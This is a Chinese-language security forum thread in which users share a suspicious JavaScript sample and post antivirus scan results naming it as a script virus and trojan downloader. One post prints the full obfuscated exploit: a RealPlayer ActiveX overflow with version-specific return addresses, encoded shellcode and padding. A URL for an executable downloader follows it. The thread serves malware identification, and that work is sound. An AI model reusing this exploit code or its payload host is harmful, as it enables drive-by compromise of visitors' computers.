java代码

lkj-17

大家看看

qigang

没有问题吧。

Graybird

Starting the file scan:

Begin scan in 'E:\rl[1].rar'
E:\rl[1].rar
  [0] Archive type: RAR
  --> rl[1].js
      [DETECTION] Contains detection pattern of the Java script virus JS/Agent.ES
      [INFO]      The file was deleted!

saber123

没有查出来...不知道有没有问题这个代码

saber123

原帖由 Graybird 于 2008-1-6 20:34 发表
Starting the file scan:

Begin scan in 'E:\rl[1].rar'
E:\rl[1].rar
  [0] Archive type: RAR
  --> rl[1].js
      [DETECTION] Contains detection pattern of the Java script virus JS/Agent.ES
      ...

我的金山2008查不出来,看来金山对于脚本病毒果然=0

无尽藏海

蜘蛛
rl[1].rar\rl[1].js                               D:\Downloads\样本\rl[1].rar      VBS.PackFor.2

qigang

这个是不是太平洋今天被怀疑挂的那个？

dikex

1. var addr=["%75%06%74%04","%7f%a5%60","%4f%71%a4%60","%63%11%08%60","%63%11%04%60","%79%31%01%60","%79%31%09%60","%51%11%70%63"];function xinnuo(){var user=navigator.userAgent.toLowerCase();if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)return;if(user.indexOf("nt 5.")==-1)return;VulObject="IEaaR"+"PCaaatl.I"+"EaaaRP"+"Ctaaal.1";try{Real=new ActiveXObject(VulObject.replace(/a/g,""))}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");sdfdgdfg="";cvbcbb=unescape(addr[0]);for(i=0;i<32*148;i++)sdfdgdfg+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape(addr[1]);else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape(addr[2]);else return}else if(RealVersion=="6.0.14.544")ret=unescape(addr[3]);else if(RealVersion=="6.0.14.550")ret=unescape(addr[4]);else if(RealVersion=="6.0.14.552")ret=unescape(addr[5]);else if(RealVersion=="6.0.14.543")ret=unescape(addr[6]);else if(RealVersion=="6.0.14.536")ret=unescape(addr[7]);else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}qwfgsg="LLLL\\XXXXXLD";Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRQPqrQTnQx0a2OVQ06UedxtnasPopmvO3TPoRWPnVNQuqh1uopuP";xcbfcxn=sdfdgdfg+qwfgsg+Shell;temp=0x8000;while(xcbfcxn.length<temp)xcbfcxn+="lizhen";var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\TestSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];Real.Import(arr1[Math.floor(Math.random()*6)],xcbfcxn,"123456456",0,0)}xinnuo();
   
2. 
   
3. 
   

复制代码

http://qqq.hao1658.com/down.exe

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Malicious Code           

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.25.62

无尽藏海

Begin scan in 'D:\Downloads\样本\virus1.rar'
D:\Downloads\样本\virus1.rar
  [0] Archive type: RAR
  --> down.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Small.hdz.2